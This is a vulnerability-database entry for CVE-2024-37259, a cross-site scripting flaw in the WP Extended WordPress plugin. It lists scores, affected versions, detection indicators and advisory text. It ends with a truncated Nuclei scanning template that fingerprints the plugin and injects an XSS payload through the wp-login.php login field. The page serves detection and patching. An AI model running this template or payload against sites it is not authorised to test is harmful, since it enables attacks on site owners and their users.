CVE-2024-37259
published 2024-07-22CVE-2024-37259: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit – WP Extended…
PriorityP180medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
0.63%
45.6th percentile
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit – WP Extended wpextended.This issue affects The Ultimate WordPress Toolkit – WP Extended: from n/a through <= 2.4.7.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wp_extended | the_ultimate_wordpress_toolkit_wp_extended | <= 2.4.7 | — |
| wpextended | wp_extended | < 3.0.0 | 3.0.0 |
Detection & IOCsextracted from sources · hover to see the quote
- →Probe for plugin presence by requesting the readme.txt file and checking for the plugin name string in the response body. ↗
- →Vulnerable versions are 2.4.7 and below; extract the version from the readme.txt 'Stable tag' field and compare. ↗
- →The XSS payload is reflected in the login-attempt admin page; confirm exploitation by checking that the raw XSS payload appears in the body of the wp-extended_login_attempt admin page response. ↗
- →The attack vector requires an authenticated session; look for POST requests to /wp-login.php followed by access to the admin login-attempt page as an indicator of exploitation attempts. ↗
- →Version string can be extracted from the plugin readme.txt using the regex pattern 'Stable tag: ([0-9.]+)'. ↗
- ·Exploitation requires an authenticated (logged-in) WordPress session before the XSS can be triggered on the admin page. ↗
- ·The vulnerability affects WP Extended versions from n/a through 2.4.7 inclusive; versions above 2.4.7 are not affected. ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c4x4-cgpc-c2rw: Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolki
ghsa_unreviewed·2024-07-22
CVE-2024-37259 [HIGH] CWE-79 GHSA-c4x4-cgpc-c2rw: Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolki
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit – WP Extended allows Reflected XSS.This issue affects The Ultimate WordPress Toolkit – WP Extended: from n/a through 2.4.7.
VulnCheck
wpextended wp_extended Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2024·CVSS 6.1
CVE-2024-37259 [MEDIUM] wpextended wp_extended Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
wpextended wp_extended Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit – WP Extended wpextended.This issue affects The Ultimate WordPress Toolkit – WP Extended: from n/a through <= 2.4.7.
Affected: wpextended wp_extended
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/database/wordpress/plugin/wpextended/vulnerability/wordpress-wp-extended-plugin-2-4-7-cross-site-scripting-xss-vulnerability
No detection rules found.
Nuclei
WP Extended < 3.0.0 - Stored Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2024-37259 [MEDIUM] WP Extended < 3.0.0 - Stored Cross-Site Scripting
WP Extended alert(document.domain)"
http:
- raw:
- |
GET /wp-content/plugins/wpextended/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "compare_versions(version, '<= 2.4.7')"
- "contains(body, 'The Ultimate WordPress Toolkit - WP Extended')"
condition: and
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Stable tag: ([0-9.]+)'
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{url_encode(payload)}}&pwd=wrongpassword&wp-submit=Log+In&redirect_to=&testcookie=1
attack: batteringram
payloads:
payload:
- "{{raw_payload}}"
- "{{raw_payload}}"
- "{{raw_payload}}"
- "{{raw_payload}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "wp-login")'
condition: and
internal: tru
No writeups or analysis indexed.
2024-07-22
Published
Exploited in the wild